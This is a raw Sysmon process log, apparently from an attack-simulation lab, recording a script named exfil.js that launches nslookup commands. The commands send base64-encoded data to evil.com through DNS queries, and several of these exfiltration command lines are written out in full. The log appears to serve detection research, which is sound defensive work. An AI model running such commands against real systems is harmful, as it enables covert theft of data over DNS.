14:21:43.726{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5245-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213071Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-18E0-629A-6742-000000005F02}39762872C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-5245-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.733{2E1864BB-18F7-629A-5245-000000005F02}1276C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.726{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljnbx.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-18F7-629A-5045-000000005F02}33485688C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5145-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5145-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.694{2E1864BB-18F7-629A-4F45-000000005F02}66606848C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-5145-000000005F02}5792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.695{2E1864BB-18F7-629A-5145-000000005F02}5792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4F45-000000005F02}6660C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljnbx.tmp 2>&1 10341000x8000000000000000213060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.671{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5045-000000005F02}3348C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.671{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5045-000000005F02}3348C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.671{2E1864BB-18F7-629A-5045-000000005F02}33485688C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4F45-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.655{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5045-000000005F02}3348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4F45-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-18E0-629A-6742-000000005F02}39767716C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4F45-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.653{2E1864BB-18F7-629A-4F45-000000005F02}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljnbx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.640{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxcqd.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-18F7-629A-4D45-000000005F02}14887392C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4E45-000000005F02}3192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.608{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C